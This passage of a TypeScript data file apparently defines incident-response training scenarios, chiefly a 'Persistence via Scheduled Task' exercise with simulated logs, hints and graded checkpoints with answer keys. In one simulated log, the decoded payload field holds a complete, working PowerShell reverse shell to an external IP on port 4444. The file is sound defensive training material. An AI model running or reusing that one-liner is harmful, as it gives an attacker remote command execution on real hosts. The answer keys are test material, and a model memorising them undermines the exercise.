    { stageNumber: 1, checkpointType: CheckpointType.SEVERITY_CLASSIFICATION, question: 'Classify the severity.', correctAnswer: 'CRITICAL', points: 10, category: 'accuracy', options: ['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'], sortOrder: 3 },
    { stageNumber: 1, checkpointType: CheckpointType.RECOMMENDED_ACTION, question: 'First response action?', correctAnswer: 'Isolate the host', points: 15, category: 'response', options: ['Isolate the host', 'Delete the malware file', 'Run antivirus scan', 'Restore from backup'], sortOrder: 4 },
    { stageNumber: 2, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'What lateral movement technique was used?', correctAnswer: 'SMB scanning for shared folders', points: 10, category: 'accuracy', options: ['RDP connections', 'SMB scanning for shared folders', 'WMI remote execution', 'Email propagation'], sortOrder: 1 },
    { stageNumber: 2, checkpointType: CheckpointType.EVIDENCE_SELECTION, question: 'Select all IOCs.', correctAnswer: ['HRToolkit_v2.exe', 'ransomware_hash_001', '.locked extension', 'SHARE-01 Public folder'], points: 15, category: 'evidence', options: ['HRToolkit_v2.exe', 'ransomware_hash_001', '.locked extension', 'SHARE-01 Public folder', 'chrome.exe', 'Kingston DataTraveler', '10.0.5.15'], sortOrder: 2 },
    { stageNumber: 2, checkpointType: CheckpointType.INCIDENT_REPORT, question: 'Write incident summary with 3+ recommendations.', correctAnswer: { keywords: ['ransomware', 'public share', 'isolate', 'encrypt', 'lateral'], minRecommendations: 3 }, points: 10, category: 'report', sortOrder: 3 },
    { stageNumber: 2, checkpointType: CheckpointType.SEVERITY_CLASSIFICATION, question: 'Final incident severity?', correctAnswer: 'CRITICAL', points: 10, category: 'accuracy', options: ['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'], sortOrder: 4 },
  ],
};

export const scenario5 = {
  id: 'scenario-scheduled-task',
  name: 'Persistence via Scheduled Task',
  description: 'Investigate a suspicious scheduled task created outside of IT change management that runs PowerShell with encoded commands on system startup.',
  difficulty: Difficulty.ADVANCED,
  category: 'Persistence',
  mitreAttackIds: ['T1053.005', 'T1078', 'T1059.001'],
  briefing: `## Scenario Briefing\n\nDuring routine security auditing, a new scheduled task "SystemHealthCheck" was discovered on server APP-SRV02. This task was not created through the change management process.\n\nThe task runs a PowerShell script with encoded arguments on every system startup.\n\n**Investigate the origin, purpose, and potential impact of this persistence mechanism.**`,
  estimatedMinutes: 50,
  stages: [
    {
      stageNumber: 1,
      title: 'Unusual Scheduled Task',
      description: 'Examine the scheduled task and its configuration.',
      unlockCondition: UnlockCondition.AFTER_PREVIOUS,
      logs: [
        { logType: LogType.WINDOWS_EVENT, summary: 'Scheduled task "SystemHealthCheck" created by admin.backup account', severity: 'HIGH', hostname: 'APP-SRV02', username: 'admin.backup', eventId: '4698', timestamp: '2024-04-01T02:15:00Z', isEvidence: true, evidenceTag: 'task-created', rawLog: { eventId: 4698, taskName: 'SystemHealthCheck', createdBy: 'CORP\\admin.backup', trigger: 'AtStartup', action: 'powershell.exe -NoP -W Hidden -Enc BASE64ENCODEDPAYLOAD', runLevel: 'HighestAvailable' }, sortOrder: 1 },
        { logType: LogType.SIEM_ALERT, summary: 'SIEM: Scheduled task created outside change window by admin.backup', severity: 'HIGH', hostname: 'SIEM-01', username: 'admin.backup', timestamp: '2024-04-01T02:15:05Z', isEvidence: true, evidenceTag: 'siem-task-alert', rawLog: { alertId: 'SIEM-2024-11001', ruleName: 'Out-of-Band Scheduled Task', account: 'admin.backup', server: 'APP-SRV02', changeTicket: 'NONE' }, sortOrder: 2 },
        { logType: LogType.AUTH_LOG, summary: 'Login for admin.backup on APP-SRV02 at 2:10 AM - unusual hour', severity: 'HIGH', hostname: 'APP-SRV02', username: 'admin.backup', eventId: '4624', sourceIp: '10.0.10.5', timestamp: '2024-04-01T02:10:00Z', isEvidence: true, evidenceTag: 'suspicious-login', rawLog: { eventId: 4624, logonType: 3, targetUserName: 'admin.backup', sourceIp: '10.0.10.5', workstationName: 'WS-IT03' }, sortOrder: 3 },
        { logType: LogType.AUTH_LOG, summary: 'admin.backup account last password change was 180 days ago', severity: 'MEDIUM', hostname: 'DC-01', username: 'admin.backup', timestamp: '2024-04-01T02:10:01Z', isEvidence: true, evidenceTag: 'stale-password', rawLog: { accountInfo: { username: 'admin.backup', type: 'Service Account', lastPasswordChange: '2023-10-04', passwordAge: 180, department: 'IT Backup Services', isActive: true } }, sortOrder: 4 },
        { logType: LogType.WINDOWS_EVENT, summary: 'Normal: Task Scheduler service started', severity: 'INFO', hostname: 'APP-SRV02', eventId: '6005', timestamp: '2024-04-01T00:00:00Z', isEvidence: false, rawLog: { eventId: 6005, message: 'Task Scheduler service started' }, sortOrder: 5 },
        { logType: LogType.AUTH_LOG, summary: 'Normal login for svc.monitoring on APP-SRV02', severity: 'INFO', hostname: 'APP-SRV02', username: 'svc.monitoring', eventId: '4624', timestamp: '2024-04-01T01:00:00Z', isEvidence: false, rawLog: { eventId: 4624, logonType: 5, targetUserName: 'svc.monitoring' }, sortOrder: 6 },
      ],
      hints: [
        { content: 'Check the time the task was created - 2:15 AM is outside normal business and change windows.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'The admin.backup account has a 180-day old password - possible credential compromise.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
    {
      stageNumber: 2,
      title: 'Task Analysis',
      description: 'Decode the scheduled task payload and analyze what it does.',
      unlockCondition: UnlockCondition.AFTER_CHECKPOINT,
      logs: [
        { logType: LogType.SYSMON, summary: 'Process Create: Scheduled task executed powershell.exe with encoded command on boot', severity: 'CRITICAL', hostname: 'APP-SRV02', processName: 'powershell.exe', eventId: '1', timestamp: '2024-04-02T06:00:05Z', isEvidence: true, evidenceTag: 'task-execution', rawLog: { eventId: 1, processId: 9001, image: 'powershell.exe', commandLine: 'powershell.exe -NoP -W Hidden -Enc BASE64ENCODEDPAYLOAD', parentImage: 'svchost.exe', parentCommandLine: 'svchost.exe -k netsvcs -p -s Schedule', decodedPayload: "$c=New-Object Net.Sockets.TCPClient('94.131.22.8',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}" }, sortOrder: 1 },
        { logType: LogType.SYSMON, summary: 'Network Connection: PowerShell reverse shell connecting to 94.131.22.8:4444', severity: 'CRITICAL', hostname: 'APP-SRV02', processName: 'powershell.exe', eventId: '3', sourceIp: '10.0.10.20', destIp: '94.131.22.8', timestamp: '2024-04-02T06:00:10Z', isEvidence: true, evidenceTag: 'reverse-shell', rawLog: { eventId: 3, processId: 9001, sourceIp: '10.0.10.20', destIp: '94.131.22.8', destPort: 4444, protocol: 'tcp' }, sortOrder: 2 },
        { logType: LogType.EDR_ALERT, summary: 'EDR: PowerShell reverse shell detected - outbound TCP to known-bad IP', severity: 'CRITICAL', hostname: 'APP-SRV02', timestamp: '2024-04-02T06:00:12Z', isEvidence: true, evidenceTag: 'edr-revshell', rawLog: { alertId: 'EDR-2024-12001', alertName: 'Reverse Shell via PowerShell', destIp: '94.131.22.8', destPort: 4444, confidence: 0.99, decodedCommand: 'TCP reverse shell to 94.131.22.8:4444' }, sortOrder: 3 },
        { logType: LogType.NETWORK_FLOW, summary: 'Normal HTTPS traffic from APP-SRV02 to update servers', severity: 'INFO', hostname: 'APP-SRV02', sourceIp: '10.0.10.20', destIp: '13.107.4.50', timestamp: '2024-04-02T06:05:00Z', isEvidence: false, rawLog: { protocol: 'HTTPS', destPort: 443, application: 'WindowsUpdate' }, sortOrder: 4 },
      ],
      hints: [
        { content: 'The decoded payload shows a classic PowerShell reverse shell - TCPClient to an external IP on port 4444.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'Port 4444 is the default Metasploit/meterpreter listener port.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
    {
      stageNumber: 3,
      title: 'Root Cause Analysis',
      description: 'Determine how the admin.backup account was compromised and the full scope.',
      unlockCondition: UnlockCondition.AFTER_CHECKPOINT,
      logs: [
        { logType: LogType.AUTH_LOG, summary: 'admin.backup credentials found in password spray attack logs from 2 weeks ago', severity: 'HIGH', hostname: 'DC-01', username: 'admin.backup', timestamp: '2024-03-18T04:30:00Z', isEvidence: true, evidenceTag: 'spray-attack', rawLog: { eventId: 4625, attackType: 'Password Spray', targetAccounts: ['admin.backup', 'svc.sql', 'admin.deploy'], sourceIp: '91.215.44.12', successfulAccounts: ['admin.backup'], timeframe: '2024-03-18T04:00:00Z to 2024-03-18T05:00:00Z' }, sortOrder: 1 },
        { logType: LogType.SIEM_ALERT, summary: 'SIEM: admin.backup account used from WS-IT03 - not the usual source for this account', severity: 'HIGH', hostname: 'SIEM-01', timestamp: '2024-04-01T02:11:00Z', isEvidence: true, evidenceTag: 'unusual-source', rawLog: { alertId: 'SIEM-2024-11003', account: 'admin.backup', normalSources: ['BACKUP-SRV01'], currentSource: 'WS-IT03', risk: 'High' }, sortOrder: 2 },
        { logType: LogType.AUTH_LOG, summary: 'WS-IT03 is assigned to j.nguyen (IT department)', severity: 'MEDIUM', hostname: 'DC-01', timestamp: '2024-04-01T02:11:01Z', isEvidence: true, evidenceTag: 'workstation-owner', rawLog: { workstation: 'WS-IT03', assignedTo: 'j.nguyen', department: 'IT', lastPatched: '2024-03-25' }, sortOrder: 3 },
        { logType: LogType.EDR_ALERT, summary: 'EDR: WS-IT03 had Mimikatz execution detected 3 days ago', severity: 'CRITICAL', hostname: 'WS-IT03', timestamp: '2024-03-29T23:45:00Z', isEvidence: true, evidenceTag: 'mimikatz', rawLog: { alertId: 'EDR-2024-11500', alertName: 'Credential Dumping Tool Detected', toolName: 'Mimikatz', user: 'j.nguyen', action: 'Alert generated, not blocked' }, sortOrder: 4 },
        { logType: LogType.WINDOWS_EVENT, summary: 'Normal: Backup job completed on BACKUP-SRV01', severity: 'INFO', hostname: 'BACKUP-SRV01', timestamp: '2024-04-01T01:00:00Z', isEvidence: false, rawLog: { eventId: 4, source: 'BackupExec', status: 'Success' }, sortOrder: 5 },
      ],
      hints: [
        { content: 'The password spray from 2 weeks ago successfully compromised admin.backup - follow that thread.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'Mimikatz on WS-IT03 suggests the attacker first compromised j.nguyen, then dumped credentials to get admin.backup.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
  ],
  checkpoints: [
    { stageNumber: 1, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'What type of account is admin.backup?', correctAnswer: 'Service account', points: 10, category: 'accuracy', options: ['Regular user', 'Service account', 'Local admin', 'Domain admin'], sortOrder: 1 },
    { stageNumber: 1, checkpointType: CheckpointType.TRUE_FALSE, question: 'The scheduled task was created during normal business hours.', correctAnswer: false, points: 10, category: 'accuracy', options: ['True', 'False'], sortOrder: 2 },
    { stageNumber: 2, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'What is the decoded payload?', correctAnswer: 'PowerShell reverse shell', points: 10, category: 'accuracy', options: ['File encryption', 'PowerShell reverse shell', 'Data exfiltration script', 'Keylogger'], sortOrder: 1 },
    { stageNumber: 2, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'What C2 port is used?', correctAnswer: '4444', points: 10, category: 'accuracy', options: ['443', '8080', '4444', '8443'], sortOrder: 2 },
    { stageNumber: 2, checkpointType: CheckpointType.RECOMMENDED_ACTION, question: 'Priority action?', correctAnswer: 'Isolate the host', points: 15, category: 'response', options: ['Isolate the host', 'Delete the scheduled task', 'Change the password', 'Monitor the connection'], sortOrder: 3 },
    { stageNumber: 3, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'How were the admin.backup credentials initially compromised?', correctAnswer: 'Password spray attack', points: 10, category: 'accuracy', options: ['Phishing email', 'Password spray attack', 'Credential stuffing', 'Social engineering'], sortOrder: 1 },
    { stageNumber: 3, checkpointType: CheckpointType.EVIDENCE_SELECTION, question: 'Select all IOCs.', correctAnswer: ['94.131.22.8', 'SystemHealthCheck task', 'admin.backup compromise', '91.215.44.12'], points: 15, category: 'evidence', options: ['94.131.22.8', 'SystemHealthCheck task', 'admin.backup compromise', '91.215.44.12', 'BACKUP-SRV01', 'WindowsUpdate traffic', '10.0.10.20'], sortOrder: 2 },
    { stageNumber: 3, checkpointType: CheckpointType.INCIDENT_REPORT, question: 'Write full incident report with attack chain and 3+ recommendations.', correctAnswer: { keywords: ['password spray', 'mimikatz', 'scheduled task', 'reverse shell', 'persistence', 'credential'], minRecommendations: 3 }, points: 10, category: 'report', sortOrder: 3 },
    { stageNumber: 3, checkpointType: CheckpointType.SEVERITY_CLASSIFICATION, question: 'Final severity?', correctAnswer: 'CRITICAL', points: 10, category: 'accuracy', options: ['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'], sortOrder: 4 },
  ],
};
